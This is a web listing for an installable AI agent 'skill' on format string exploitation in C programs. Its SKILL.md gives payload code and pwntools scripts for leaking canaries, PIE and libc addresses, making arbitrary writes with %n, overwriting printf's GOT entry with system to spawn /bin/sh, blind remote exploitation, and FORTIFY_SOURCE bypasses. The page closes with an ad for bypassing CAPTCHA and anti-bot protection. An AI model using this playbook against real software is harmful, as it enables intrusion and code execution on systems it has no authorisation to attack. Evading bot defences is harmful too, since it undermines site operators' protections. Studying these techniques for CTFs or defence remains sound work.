format-string-exploitation

>-

INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill format-string-exploitation
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

$27

printf(user_input);          // VULNERABLE: user controls format string

fprintf(fp, user_input);     // VULNERABLE

sprintf(buf, user_input);    // VULNERABLE

snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

Quick Test

Input: AAAA%p%p%p%p%p%p%p%p

If output shows stack values (hex addresses): format string confirmed

Look for 0x4141414141414141 in output to find your input offset

2. READING MEMORY

Stack Leak (%p)

Format

Action

Use

%p

Print next stack value as pointer

Sequential stack dump

%N$p

Print N-th parameter as pointer

Direct positional access

%N$lx

Same as %p but explicit hex (64-bit)

Portable

%N$s

Dereference N-th parameter as string pointer

Read memory at pointer value

Finding Your Input Offset

# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

# Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...

#                                                           ↑ offset = 6 (example)

# Or automated:

for i in range(1, 30):

    io.sendline(f'AAAA%{i}$p')

    if '0x41414141' in io.recvline():

        print(f'Offset = {i}')

        break

Leaking Specific Values

Target

Method

Stack Position

Canary

%N$p where N = canary offset from format string

Typically at offset buf_size/8 + few

Saved RBP

%N$p (just above return address)

Leaks stack address → stack base

Return address

%N$p

Leaks .text address (PIE base = leak & ~0xfff - offset)

Libc address

%N$p where N points to __libc_start_main+XX return on stack

libc base = leak - offset

Reading Arbitrary Address (%s)

# 32-bit: place address at start of format string

payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers

payload = b'%8$sAAAA' + p64(target_addr)  # %8$s reads from offset 8 where address is

3. WRITING MEMORY (%n)

Write Specifiers

Specifier

Bytes Written

Width

%n

4 bytes (int)

Characters printed so far

%hn

2 bytes (short)

Characters printed so far (mod 0x10000)

%hhn

1 byte (char)

Characters printed so far (mod 0x100)

%ln

8 bytes (long)

Characters printed so far

Arbitrary Write Technique

Goal: Write value V to address A.

32-bit (address on stack directly):

# Write 2 bytes at a time using %hn

# Place target addresses in format string (they'll be on stack)

payload  = p32(target_addr)       # for low 2 bytes

payload += p32(target_addr + 2)   # for high 2 bytes

# Calculate padding for each %hn write

low = value & 0xffff

high = (value >> 16) & 0xffff

payload += f'%{low - 8}c%{offset}$hn'.encode()

payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()

64-bit (address AFTER format string):

# Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string

# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)

fmt = b'%Xc%N$hn%Yc%M$hn'

# Step 2: pad to 8-byte alignment

fmt = fmt.ljust(align, b'A')

# Step 3: append target addresses

fmt += p64(target_addr)

fmt += p64(target_addr + 2)

Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):

writes = {}

for i in range(6):

    byte_val = (value >> (i * 8)) & 0xff

    writes[target_addr + i] = byte_val

# pwntools handles the math:

from pwn import fmtstr_payload

payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

4. PWNTOOLS fmtstr_payload()

from pwn import *

# Overwrite GOT entry with target address

payload = fmtstr_payload(

    offset,                    # stack offset where input appears

    {elf.got['printf']: libc.symbols['system']},  # {addr: value}

    numbwritten=0,             # bytes already output before our input

    write_size='short'         # 'byte', 'short', or 'int'

)

# For 64-bit with addresses after format string:

# fmtstr_payload handles this automatically

FmtStr Class (Interactive Exploitation)

from pwn import *

def send_payload(payload):

    io.sendline(payload)

    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)

# fmt.offset is auto-detected

fmt.write(elf.got['printf'], libc.symbols['system'])

fmt.execute_writes()

5. GOT OVERWRITE VIA FORMAT STRING

Common Targets

Overwrite

With

Trigger

printf@GOT

system

Next printf(user_input)system(user_input), send /bin/sh

strlen@GOT

system

If strlen(user_input) called

puts@GOT

system

If puts(user_input) called

atoi@GOT

system

If atoi(user_input) called (send sh as "number")

__stack_chk_fail@GOT

Controlled addr

Bypass canary check entirely

exit@GOT

main

Create infinite loop for multi-shot exploit

Hook Targets (glibc

Target

One-gadget

Trigger

__malloc_hook

one_gadget addr

Any printf with large format → internal malloc

__free_hook

system

Trigger free("/bin/sh")

6. STACK POINTER CHAIN EXPLOITATION

When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.

Two-Stage Write

Stack:

  [offset A] → ptr_X (stack address pointing to another stack address)

  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr

Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr

This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

Finding Pointer Chains

# Leak stack with %p, look for:

# 1. Stack address A at offset N that points to another stack address B

# 2. Stack address B at offset M

# Modify value at A (using %N$hn) to change where B points

# Then write through B (using %M$hn) to target

7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

Methodology

Step

Action

Purpose

1

Send %p × 50

Dump stack, identify address patterns

2

Identify offsets

Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs

3

Find input offset

Send AAAA%N$p for N=1..50, find 0x41414141

4

Identify binary base

Code addresses reveal PIE base (or fixed base if no PIE)

5

Leak GOT entries

If binary base known, read GOT via %N$s with GOT address

6

Calculate libc base

GOT value - libc symbol offset

7

Overwrite GOT

%n to rewrite GOT entry with system address

8. FORTIFY_SOURCE BYPASS

FORTIFY_SOURCE (gcc -D_FORTIFY_SOURCE=2) replaces printf with __printf_chk which **forbids %N$n** (positional writes).

Bypass Techniques

Method

Detail

Use %hn sequentially (no positional)

Print exact byte count, %hn, adjust, %hn — fragile but works

Stack-based exploit

If format string is on stack, use non-positional %n with stack position control

Heap overflow instead

FORTIFY doesn't protect heap — combine with heap bug

Return-to-printf

ROP to call unfortified printf (if available in binary or libc)

9. 64-BIT CONSIDERATIONS

Challenge

Solution

Addresses contain \x00 (null byte terminates format string)

Place addresses AFTER format specifiers, pad to alignment

Address width: 6 significant bytes

Write 3 × %hn (2 bytes each) or 6 × %hhn

Larger stack offset range

Input may be at offset 6+ due to 6 register args saved

48-bit address space

Only bottom 48 bits of 64-bit used

Layout Template (64-bit)

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...

 ← no null bytes here →                          ← null bytes OK (after fmt) →

10. DECISION TREE

Format string vulnerability confirmed (printf(user_input))

├── FORTIFY_SOURCE enabled? (__printf_chk)

│   ├── YES → positional %n blocked

│   │   ├── Sequential %n possible? → non-positional write

│   │   └── Combine with another primitive (heap, ROP)

│   └── NO → full positional %n available

├── What do you need first?

│   ├── Leak canary → %N$p at canary stack offset

│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset

│   ├── Leak libc base → %N$p at __libc_start_main return on stack

│   ├── Leak heap base → %N$p at heap pointer on stack

│   └── Leak specific address → %N$s with target address on stack

├── Architecture?

│   ├── 32-bit → addresses at start of format string

│   └── 64-bit → addresses after format string (null byte issue)

├── Write target?

│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)

│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)

│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list

│   └── Stack return address → direct overwrite (if ASLR bypassed)

├── Single-shot or multi-shot?

│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains

│   └── One-shot → fmtstr_payload() with all writes in single payload

└── Input not on stack? (heap buffer)

    └── Use stack pointer chains for indirect writes
BrowserAct

Let your agent run on any real-world website

Bypass CAPTCHA & anti-bot for free. Start local, scale to cloud.

Explore BrowserAct Skills →

Stop writing automation&scrapers

Install the CLI. Run your first Skill in 30 seconds. Scale when you're ready.

Start free
free · no credit card